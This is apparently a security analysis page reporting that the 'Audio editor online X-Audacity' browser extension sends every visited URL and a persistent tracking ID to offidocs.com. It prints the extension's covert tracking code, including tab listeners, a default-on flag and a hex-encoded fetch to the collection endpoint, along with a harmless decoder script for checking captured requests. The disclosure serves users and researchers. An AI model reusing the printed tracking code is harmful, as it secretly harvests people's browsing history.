Is Audio editor online X-Audacity safe?
Audio editor online X-Audacity transmits every visited URL, hex-encoded, to offidocs.com along with a persistent per-installation tracking ID.
On every tab activation and update, the extension captures the full URL of any non-offidocs.com page and sends it to a tracking endpoint at www.offidocs.com. Each installation is assigned a random 10-character ID on first run, stored in local storage, and included with every request — enabling per-user browsing history collection. This behavior is on by default and can only be disabled by the user toggling a local storage flag.
Who publishes itofficeonlinesystems - 26 other listings from the same operator, 17 of them carrying a finding
officeonlinesystems - 26 other listings from the same operator, 17 of them carrying a finding
What this publisher told the store about itself, and the other listings that told it the same thing.
Same store account
19 other listings published from this account, 951k+ users between them. 14 of them carry a finding.
Same operator - 7 listings
Published under a different store account, but sharing the registered address, contact or declared legal entity this one gave the store.
Shared hosts - 1 hostname
Hostnames hardcoded in this extension that few other listings call. That can mean one operator behind both, and it can equally mean a small shared vendor, so it is context rather than a conclusion. Hosts that many listings call are left out: they are services, not connections.
AI-generated. Findings may contain errors. Those marked Verified have been manually reviewed.
Publishers can request a review.
Findings
Audio editor extension transmits every visited URL to offidocs.com
The extension sends the address of every site you visit to www.offidocs.com, paired with a persistent 10-char ID.
Fires on tab switch/navigation, all sites, no interaction.
Confirmed: hex-encoded GETs left within seconds.
On by default.
You open or switch to any website in your browser.
Any HTTP or HTTPS tab, including background tabs you click into, triggers the request. Only offidocs.com pages and non-HTTP URLs (chrome://, file://) are excluded.
The extension sends your full visited URL and a persistent tracking identifier to www.offidocs.com.
The request fires automatically with no user interaction beyond normal browsing. The tracking flag defaults to enabled on installation.
The visited URL is hex-encoded one character at a time before appearing in the filepath query parameter. The encoding is trivially reversible and provides no privacy.
https://www.example.com/page
| Field | Value | Why it matters | |
|---|---|---|---|
Visited URL (hex-encoded) | filepath=68747470733a2f2f7777772e6578616d706c652e636f6d2f70616765 (decodes to https://www.example.com/page) | The complete address of every page you open or switch to, sent as the filepath parameter, including banking, medical, or internal sites. | |
Installation tracking ID | u=hyclrbnmvb | A random 10-char ID from first run, stored permanently, sent on every request, letting the server tie all your browsing to one install. |
Navigation listener and URL transmission, websecure.js
// Called on every tab switch (onActivated) and every page navigation (onUpdated).
// Filter: HTTP/HTTPS only; skips offidocs.com itself; deduplicates consecutive same-URL events.
async function getTabInfo(tabId) {
const tab = await new Promise((resolve, reject) => {
chrome.tabs.get(tabId, (tab) => tab ? resolve(tab) : reject(new Error("Tab not found")));
});
if (
!tab.url.includes("offidocs") && // exclude the developer's own domain
tab.url.startsWith("http") && // only HTTP/HTTPS; ignores chrome:// and file://
lastUrl !== tab.url // skip if same URL was just sent (simple dedup)
) {
lastUrl = tab.url;
extractaudio(tab.url, tabId); // transmit the visited URL to offidocs.com
}
}
class WebSecure {
init() {
// Register on both events to capture tab switches AND in-tab navigations
chrome.tabs.onActivated.addListener(activeInfo => {
activeTabId = activeInfo.tabId;
getTabInfo(activeTabId);
});
chrome.tabs.onUpdated.addListener((tabId, changeInfo, tab) => {
getTabInfo(tabId);
});
}
}async function extractaudio(urlxx, tabId) {
try {
const offidocs_key = "offidocs_key";
// Read tracking ID and enabled flag from persistent local storage
let { username: storedUsername, offidocscloud } = await chrome.storage.local.get(offidocs_key);
if (!storedUsername) {
// First run: generate a random 10-char lowercase ID and default tracking to enabled
storedUsername = randomString(10).toLowerCase();
await chrome.storage.local.set({
[offidocs_key]: {
username: storedUsername,
offidocscloud: "1" // '1' = enabled; this is the out-of-box default
}
});
}
// Only suppressed if the user explicitly toggled the flag to "0" in the popup
if (offidocscloud === "0") return;
// Hex-encode the visited URL and send it with the persistent tracking ID
const response = await fetch(
`https://www.offidocs.com/media/system/app/checkdownloadaudacityx_3_nav.php?filepath=${bin2hex(urlxx)}&hex=1&u=${storedUsername}`
);
} catch (error) {
console.error("Audio extraction failed:", error);
}
}
// Trivially reversible hex encoding applied to every visited URL
function bin2hex(bin) {
return Array.from(bin).map(c =>
c.charCodeAt(0).toString(16).padStart(2, '0')
).join('');
}Decodes the hex-encoded filepath parameter found in GET requests to offidocs.com, letting you verify that URLs in your own proxy or browser network logs correspond to websites you actually visited.
#!/usr/bin/env node
// decode-offidocs-filepath.js
//
// Decodes the hex-encoded 'filepath' query parameter from GET requests to:
// https://www.offidocs.com/media/system/app/checkdownloadaudacityx_3_nav.php
//
// Capture the request in your browser's DevTools Network panel or a proxy,
// copy the value of the 'filepath' query parameter, and pass it here.
const hex = process.argv[2];
if (!hex) {
console.error('Usage: node decode-offidocs-filepath.js <filepath_hex_value>');
console.error('');
console.error('Example:');
console.error(' node decode-offidocs-filepath.js 68747470733a2f2f7777772e6578616d706c652e636f6d2f70616765');
console.error(' → https://www.example.com/page');
process.exit(1);
}
if (!/^[0-9a-fA-F]+$/.test(hex)) {
console.error('Error: input must be a hex string (characters 0-9, a-f, A-F only)');
process.exit(1);
}
try {
const decoded = Buffer.from(hex, 'hex').toString('utf8');
console.log('Decoded visited URL:', decoded);
} catch (err) {
console.error('Failed to decode:', err.message);
process.exit(1);
}
- 1node decode-offidocs-filepath.js <hex_value>, where <hex_value> is the filepath query parameter copied from a captured GET request to offidocs.com/media/system/app/checkdownloadaudacityx_3_nav.php
- www.offidocs.com
Receives the hex-encoded visited URL and the tracking ID via checkdownloadaudacityx_3_nav.php. Operated by the party that publishes X-Audacity on the Chrome Web Store.
Where it sends data
Destinations our analysis observed X-Audacity contacting. Sending data somewhere is not a finding on its own - an extension that syncs your settings has to talk to its own server - but it is where your data can go, and who else it goes to.
- www.offidocs.com
X-Audacity sends data to www.offidocs.com. 11 other extensions we have analysed send data here.